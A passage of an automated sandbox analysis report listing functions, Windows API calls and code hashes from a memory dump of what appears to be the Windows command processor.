Function 00007FF7823E5CB4 Relevance: 7.5, APIs: 5, Instructions: 36
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823FC9EE,?,?,?,00007FF7823FEA6C,?,?,?,00007FF7823FE925), ref: 00007FF7823E5CCB
GetExitCodeProcess.KERNELBASE(?,?,?,00007FF7823FC9EE,?,?,?,00007FF7823FEA6C,?,?,?,00007FF7823FE925), ref: 00007FF7823E5CDF
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823E5D03
fprintf.MSVCRT ref: 00007FF7823EF4A9
fflush.MSVCRT ref: 00007FF7823EF4C2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
String ID:
API String ID: 1826527819-0
Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
Instruction ID: a2ff4468f06232dc70d880a1e7dd6d4cb6fe6ade86fd3c9ce0328764aba34dfa
Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
Instruction Fuzzy Hash: E90139719086828AE640BB25E4541B8FEA1FB8E756FA45174D94F07792DEBCA888C730

Function 00007FF7823E3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7823D92AC), ref: 00007FF7823E30CA
SetErrorMode.KERNELBASE ref: 00007FF7823E30DD
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E30F6
SetErrorMode.KERNELBASE ref: 00007FF7823E3106

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorMode$FullNamePathwcschr
String ID:
API String ID: 1464828906-0
Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
Instruction ID: 312ad0231d6973ac99dde9145f20c9e4e3b21c6ba7f742d4f0bfbd9db51933b7
Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
Instruction Fuzzy Hash: 5A31C425A0865592E764BF15E41007EF660FB45B92FE48178DA4E43FD0DEFDE849C320

Function 00007FF7823DCA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823DCAB3
??_V@YAXPEAX@Z.MSVCRT(?,?,?,00007FF7823D139E), ref: 00007FF7823EC706

Strings

onecore\base\cmd\maxpathawarestring.cpp, xrefs: 00007FF7823EC6E5

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset
String ID: onecore\base\cmd\maxpathawarestring.cpp
API String ID: 2221118986-3416068913
Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
Instruction ID: 423b76c4641fe05239adfcc9ab6d587cde1923ab0086d4ed8240f3d0783d2ba6
Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
Instruction Fuzzy Hash: 87112921A1874280EF50EB55E1642B99290BF84BE5FB84779EE6D4BBD5DE7CD480C320

Function 00007FF7823DBE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823DBE52

Part of subcall function 00007FF7823DBFF0: wcschr.MSVCRT(00000001,00000000,?,00007FF7823DBEC8), ref: 00007FF7823DC03E

Strings

2, xrefs: 00007FF7823DBF20
COMSPEC, xrefs: 00007FF7823DBFC7

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memsetwcschr
String ID: 2$COMSPEC
API String ID: 1764819092-1738800741
Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
Instruction ID: 3e4a6c0cf2ccdfd2396138fb7afe1a49a3760ee3bf817341686a5cb0ab7cbccc
Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
Instruction Fuzzy Hash: 685197A1E08342A5FB607B31A468379E396BF44B86FB44079DA4D43ED5DEACE844C760

Function 00007FF7823E2EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF7823E2FA1
wcschr.MSVCRT ref: 00007FF7823E2FBC

Part of subcall function 00007FF7823E823C: FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
Part of subcall function 00007FF7823E823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D

wcsrchr.MSVCRT ref: 00007FF7823E2FEF

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$ErrorFileFindFirstLastwcsrchr
String ID:
API String ID: 4254246844-0
Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
Instruction ID: c39dd80a59581e210bd5026aa9b88c4c8f8fbae6fed3db53ba25dc5fa151d35f
Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
Instruction Fuzzy Hash: A441B325F0874296EE10AB00E4643B9E7A0FF89792FE44479D94E47F90DFBCE849C620

Function 00007FF7823E498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E49BA
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823E49C8
RtlFreeHeap.NTDLL ref: 00007FF7823E49E0

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$EnvironmentFreeProcessVariable
String ID:
API String ID: 2643372051-0
Opcode ID: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
Instruction ID: 66b3211645dbcc113554455a9723c0d26cd1546e27b955e3aad18ac803aeb091
Opcode Fuzzy Hash: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
Instruction Fuzzy Hash: 44F08672B19B4285EB40AB66F404075FEE1FF5D7A2BA59274D63E03794DEBC9884C220

Function 00007FF7823E5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823E5A89
SetConsoleMode.KERNELBASE ref: 00007FF7823E5A9E
_get_osfhandle.MSVCRT ref: 00007FF7823E5AAC

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _get_osfhandle$ConsoleMode
String ID:
API String ID: 1591002910-0
Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
Instruction ID: 815b9e161b42dcbc00516e1450e09704d648b3bfa50ebe8309110365b97ac533
Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
Instruction Fuzzy Hash: BEF06235A19702CBE644AB11E945078BEA0FB8A712BB44134C90E87324DEBCA889CB30

Function 00007FF7823E291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNELBASE ref: 00007FF7823E294A

Strings

:, xrefs: 00007FF7823E2942

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: DriveType
String ID: :
API String ID: 338552980-336475711
Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
Instruction ID: 1552b9c495b1198f31b028748a6ad8fad45433ecd7d8cfc6121c96ffa56d126e
Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
Instruction Fuzzy Hash: 39E06567618640C6D7209B50E45106AF760FB8D749FD41525D98D83B24DB3CD199CF18

Function 00007FF7823E5AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

Part of subcall function 00007FF7823E0A6C: _wcsnicmp.MSVCRT ref: 00007FF7823E0AFE
Part of subcall function 00007FF7823E0A6C: memset.MSVCRT ref: 00007FF7823E0B37
Part of subcall function 00007FF7823E0A6C: wcschr.MSVCRT ref: 00007FF7823E0B91
Part of subcall function 00007FF7823E0A6C: wcsrchr.MSVCRT ref: 00007FF7823E0C14

GetConsoleTitleW.KERNELBASE ref: 00007FF7823E5B52

Part of subcall function 00007FF7823E4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4297
Part of subcall function 00007FF7823E4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E42D7
Part of subcall function 00007FF7823E4224: memset.MSVCRT ref: 00007FF7823E42FD
Part of subcall function 00007FF7823E4224: memset.MSVCRT ref: 00007FF7823E4368
Part of subcall function 00007FF7823E4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4380
Part of subcall function 00007FF7823E4224: wcsrchr.MSVCRT ref: 00007FF7823E43E6
Part of subcall function 00007FF7823E4224: lstrcmpW.KERNELBASE ref: 00007FF7823E4401

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7823E5BC7

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
String ID:
API String ID: 497088868-0
Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
Instruction ID: f65f30f7ad848f1a1487826c341d407ed2b9ceb31849316831eeba10f3cbadfa
Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
Instruction Fuzzy Hash: 7931D564B1C68252FA20B711E4741BDE290FF89B82FE44479E94E87F95DEBCE405C720

Function 00007FF7823E9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7823E9A86
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7823E9A97

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmalloc
String ID:
API String ID: 1412018758-0
Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
Instruction ID: 0acaeeffe5221622a478c68359f63696255b99e89004fe0622172e96b5870b2e
Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
Instruction Fuzzy Hash: 3AE06D04F09207A1FE253BA2A86107892447F18742EA814B8DD0D0AF82EEACE499C330

Function 00007FF7823DCD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
Instruction ID: 0b83759cb8bbf4c04520715e515cc31c47f5580e82245f16b140522067c25896
Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
Instruction Fuzzy Hash: 69F03175E1864286EB44AB15F8500B8FBA0FB89B42BB89539D90E03754DF7CE885C720

Function 00007FF7823E4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

exit.MSVCRT(?,?,00000000,00007FF7823F1209), ref: 00007FF7823E4C31

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: exit
String ID:
API String ID: 2483651598-0
Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
Instruction ID: b49e022e1f6f7388d69f0c1ec66d1aa41d257a134d75b7a2d1f0f7fc7a0c9762
Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
Instruction Fuzzy Hash: D3C01234704646A7EB1C7732646103999647B0C202F54547CC60A82A82DDACD808C234

Function 00007FF7823E5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNELBASE(?,?,?,?,00007FF7823D6F97), ref: 00007FF7823E550C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: DefaultUser
String ID:
API String ID: 3358694519-0
Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
Instruction ID: 3ce96235199bc744a1a4da9a2b2729aa7b8dc423fca2729c20f2a6aa6e19f1ff
Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
Instruction Fuzzy Hash: 9DE0C2EAD08253ABF5943B42E0513B49993EB78783FE440B5C60F02EC4C96D2885D228

Function 00007FF7823E2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823E2E8B

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
Instruction ID: 5663b1c2a1c58b2f3add60708e504bb74ed94fddf846b321b2629b8c67e1f688
Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
Instruction Fuzzy Hash: 40F0B425B0979140EA40A757F9501299290AB88BE0B988375EA7C57FC5DE7CD451C700

Non-executed Functions

Function 00007FF7823D5B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D5C20
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823D5C39
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823D5C4E
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823D5C63
memset.MSVCRT ref: 00007FF7823D5CAC

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

wcschr.MSVCRT ref: 00007FF7823D5E17
memset.MSVCRT ref: 00007FF7823D5F23
GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823D5F33
InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823D5F68
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D5F7C
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823D5F91
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823D5FA9
InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823D5FD1
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823D6012
CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823D6088
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?), ref: 00007FF7823D60A0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823D60AC
RtlFreeHeap.NTDLL ref: 00007FF7823D60C2
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D60DA
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823D611F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823D6140
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D615C
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D6173
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D6187
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D619B
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D61AF
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D61C3
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D61D7

Part of subcall function 00007FF7823E09F4: iswspace.MSVCRT ref: 00007FF7823E0A11
Part of subcall function 00007FF7823E09F4: wcschr.MSVCRT ref: 00007FF7823E0A2B

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D61FD
_wcsicmp.MSVCRT ref: 00007FF7823D6265
_wcsicmp.MSVCRT ref: 00007FF7823D6283
_wcsicmp.MSVCRT ref: 00007FF7823D62A3
_wcsicmp.MSVCRT ref: 00007FF7823D62C3
_wcsicmp.MSVCRT ref: 00007FF7823D62E1
towupper.MSVCRT ref: 00007FF7823D62FA
